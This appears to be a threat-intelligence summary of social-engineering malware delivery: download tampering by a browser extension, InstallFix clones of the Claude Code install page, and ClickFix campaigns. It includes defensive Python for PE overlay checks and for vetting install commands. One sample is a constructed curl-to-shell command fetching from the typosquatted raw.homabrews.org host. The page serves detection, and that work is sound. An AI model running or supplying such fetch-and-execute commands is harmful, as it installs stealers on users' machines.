Mallory

Social-engineering malware delivery via trusted installation and download paths

malware delivery, malvertising, social engineering, download hijacking, installer spoofing, executable tampering, copy-paste attacks, data theft, browser extensions, developer targeting, cloned websites, cli tools, chrome extension, installfix, windows
Updated March 7, 2026 at 02:05 AM, 2 sources

Security researchers reported two malware-delivery patterns, one demonstrated as a proof of concept and one active in the wild, that abuse user trust in “normal” software acquisition flows rather than exploiting a specific browser or OS vulnerability. LayerX demonstrated a proof-of-concept Chrome add-on (Totally Innocent Extension) that can silently modify executables as they are downloaded—including from legitimate vendor sites—by appending attacker-controlled code without breaking the original application or requiring additional extension permissions, enabling follow-on outcomes such as persistence, lateral movement, and data theft. The researchers said the technique highlights gaps in browser extension security controls; Google and Mozilla did not acknowledge it as a product issue, with Google indicating that social-engineering-driven intrusions fall outside its browser threat model.
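
The LayerX technique works by appending bytes past the end of the last section the PE headers declare, so a defender's first check on a downloaded installer is whether the file is longer than its own headers say it should be, and whether its SHA-256 matches the hash the vendor publishes. The Python below is an added example written for this page, not LayerX's proof of concept or any vendor's tooling; `pe_overlay_size`, `check_download` and `build_sample_pe` are hypothetical helper names, and the PE buffer it inspects is a constructed, non-loadable stub so the example runs offline.

```python
import hashlib
import struct
from typing import Optional


def pe_overlay_size(data: bytes) -> int:
    """Bytes present after the end of the last section declared in the PE headers.

    Raises ValueError if the buffer does not carry MZ/PE headers.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # COFF file header follows "PE\0\0"
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    section_table = coff + 20 + size_opt       # section headers follow the optional header
    declared_end = 0
    for i in range(num_sections):
        hdr = section_table + i * 40           # each section header is 40 bytes
        if hdr + 40 > len(data):
            raise ValueError("truncated section table")
        size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)  # SizeOfRawData, PointerToRawData
        declared_end = max(declared_end, ptr_raw + size_raw)
    return max(0, len(data) - declared_end)


def check_download(data: bytes, vendor_sha256: Optional[str] = None) -> dict:
    """Hypothetical triage helper: overlay size plus a comparison against the hash
    the vendor publishes (None when no published hash is available)."""
    digest = hashlib.sha256(data).hexdigest()
    return {
        "sha256": digest,
        "overlay_bytes": pe_overlay_size(data),
        "hash_matches_vendor": None if vendor_sha256 is None else digest == vendor_sha256.lower(),
    }


def build_sample_pe(section_payload: bytes, overlay: bytes = b"") -> bytes:
    """Constructed, non-loadable PE-shaped buffer with one section, used only as
    sample input so the example runs without a real installer."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_opt = 0                                   # no optional header in this stub
    coff_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0)
    section_table = e_lfanew + 4 + 20 + size_opt
    raw_ptr = section_table + 40                   # payload starts right after the single header
    section_header = (
        b".text\0\0\0"
        + struct.pack("<IIII", len(section_payload), 0x1000, len(section_payload), raw_ptr)
        + b"\0" * 16
    )
    return dos_header + b"PE\0\0" + coff_header + section_header + section_payload + overlay


if __name__ == "__main__":
    clean = build_sample_pe(b"\x90" * 32)
    tampered = build_sample_pe(b"\x90" * 32, b"APPENDED_CODE")
    published = hashlib.sha256(clean).hexdigest()   # stands in for the vendor's published hash
    print(check_download(clean, published))         # overlay_bytes 0, hash matches
    print(check_download(tampered, published))      # overlay_bytes 13, hash mismatch
```

A non-zero overlay is a triage signal, not proof of tampering: Authenticode signatures and many legitimate installer formats (NSIS, Inno Setup, self-extracting archives) also store data past the last section. The comparison against the vendor's published hash is the decisive check, followed by verifying the file's signature with the platform's own tooling.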

Separately, Push Security documented InstallFix, a new variant of the ClickFix social-engineering technique, where attackers clone installation pages for popular CLI tools and replace the install steps with malicious “copy/paste” commands (e.g., curl-to-shell patterns) that fetch payloads from attacker infrastructure. A noted example used a cloned Claude Code (Anthropic) CLI install page that preserved legitimate branding and redirected most links back to the real site, while only the macOS/Windows install instructions delivered malware; the pages were promoted via Google Ads malvertising for searches like “Claude Code install,” increasing the likelihood of developer and non-developer victims executing the malicious commands.

Related Stories

Social-Engineering Malware Campaigns Targeting End Users via Browser Stores and Fake Installers

Multiple active **social-engineering-driven malware operations** are targeting end users through trusted distribution channels. One campaign, dubbed **GhostPoster**, distributed **17 malicious browser extensions** across *Chrome, Firefox, and Edge* with **840,000+ installs**, using legitimate-sounding names (e.g., “Google Translate in Right Click,” “Youtube Download,” “Ads Block Ultimate”) and evading store reviews for years. The extensions used **steganography** to hide code in PNGs, then extracted payloads to contact attacker infrastructure, enabling credential/data theft, tracking, affiliate-link hijacking, script injection, and HTTP header manipulation to weaken protections. Separately, threat actors are impersonating **Malwarebytes** via trojanized ZIP “installers” (e.g., `malwarebytes-windows-github-io-X.X.X.zip`) and using **DLL sideloading**—pairing a legitimate EXE with a malicious `CoreMessaging.dll`—to execute **infostealers**; reporting highlighted a campaign fingerprint via **behash** `4acaac53c8340a8c236c91e68244e6cb` and distinctive DLL strings used for infrastructure mapping. A different operation identified by CloudSEK involves **“RedLineCyber”** masquerading as an affiliate of “RedLine Solutions” to build credibility inside private **Discord** communities and deliver a Python-based **clipboard hijacker** (often `Pro.exe` / `peeek.exe`) aimed at **cryptocurrency wallet theft**, relying on long-term grooming of high-value targets rather than broad phishing.

1 month ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery

Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.

3 weeks ago
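
Both the InstallFix pages in the main story and the cloned Homebrew site described here depend on the victim not noticing that the host in a pasted install command has changed. The Python below is an added example, not code from Push Security, CERT Polska or any of the projects named: it extracts the URLs from a pasted command, compares their hosts to a defender-maintained allowlist for the tool (only Homebrew's real fetch host, `raw.githubusercontent.com`, taken from this story), and flags unexpected hosts whose DNS labels resemble the tool's brand name. `EXPECTED_HOSTS`, `BRAND_WORDS` and `assess_install_command` are assumptions made for this example; the legitimate sample is Homebrew's published one-liner, and the cloned sample is constructed from the `raw.homabrews.org` host in the story with a placeholder path.

```python
import re
from difflib import SequenceMatcher
from urllib.parse import urlparse

# Constructed allowlist: the hosts each tool's official installer is expected to
# fetch from. Homebrew's entry comes from the story; extend it per tool you vet.
EXPECTED_HOSTS = {
    "homebrew": {"raw.githubusercontent.com", "github.com"},
}
# Brand words a lookalike host would imitate (constructed for this example).
BRAND_WORDS = {
    "homebrew": ["homebrew", "brew"],
}

URL_RE = re.compile(r"https?://[^\s\"')|]+")
# Constructs that execute whatever the fetch returns: $(curl ...), | sh/bash/zsh, PowerShell iex.
EXEC_REMOTE_RE = re.compile(
    r"\$\(\s*(curl|wget)\b|\|\s*(sudo\s+)?(ba|z)?sh\b|\biex\b|invoke-expression",
    re.IGNORECASE,
)


def looks_like_brand(host: str, words, threshold: float = 0.75) -> bool:
    """True if any DNS label of host is a near-match for one of the brand words."""
    return any(
        SequenceMatcher(None, label, w).ratio() >= threshold
        for label in host.split(".")
        for w in words
    )


def assess_install_command(cmd: str, tool: str) -> dict:
    """Classify a pasted install command by where it fetches from."""
    hosts = sorted({urlparse(u).hostname or "" for u in URL_RE.findall(cmd)})
    allowed = EXPECTED_HOSTS.get(tool, set())
    unexpected = [h for h in hosts if h not in allowed]
    lookalikes = [h for h in unexpected if looks_like_brand(h, BRAND_WORDS.get(tool, []))]
    if not hosts:
        verdict = "no-fetch"
    elif not unexpected:
        verdict = "expected"
    elif lookalikes:
        verdict = "lookalike-host"
    else:
        verdict = "unexpected-host"
    return {
        "hosts": hosts,
        "unexpected_hosts": unexpected,
        "lookalike_hosts": lookalikes,
        "executes_remote": bool(EXEC_REMOTE_RE.search(cmd)),
        "verdict": verdict,
    }


# Constructed samples. LEGIT is Homebrew's published one-liner; CLONED uses the
# raw.homabrews.org host from the report with a placeholder path, not a real one.
LEGIT = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
CLONED = '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/PLACEHOLDER_PATH)"'
LOCAL = "brew install wget"

if __name__ == "__main__":
    for name, cmd in [("legit", LEGIT), ("cloned", CLONED), ("local", LOCAL)]:
        print(name, assess_install_command(cmd, "homebrew"))
```

Note that the legitimate command also executes remote content (`executes_remote` is true for both samples), so pipe-to-shell alone is not a useful signal; the fetch host is. During triage the same check can be run over clipboard contents, `Win+R` history or shell history recovered from an affected host, and over install snippets in internal documentation before they are published.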
InstallFix malvertising campaign spreads fake Claude Code installers to deliver Amatera Stealer

Push Security reported a new **ClickFix-style** social-engineering campaign dubbed **InstallFix** that uses **Google-sponsored search ads** to drive developers to near-identical cloned “install” pages for *Anthropic Claude Code* and similar AI coding tools. Victims are prompted to copy/paste terminal commands from the fake pages; executing them installs **Amatera Stealer**, enabling credential theft and potential access to enterprise development environments. Separate reporting highlighted adjacent browser-based tradecraft: a previously legitimate Chrome extension (*QuickLens – Search Screen with Google Lens*) with roughly **7,000 users** was updated to deploy **ClickFix** attacks, strip web security headers, and steal cryptocurrency wallet seed phrases before being removed from the Chrome Web Store. A weekly threat bulletin also noted unrelated incidents (e.g., ransomware and data breaches) and separate AI-themed malicious extensions that harvest LLM chat histories, but those items are not part of the InstallFix/Claude Code malvertising campaign itself.

1 week ago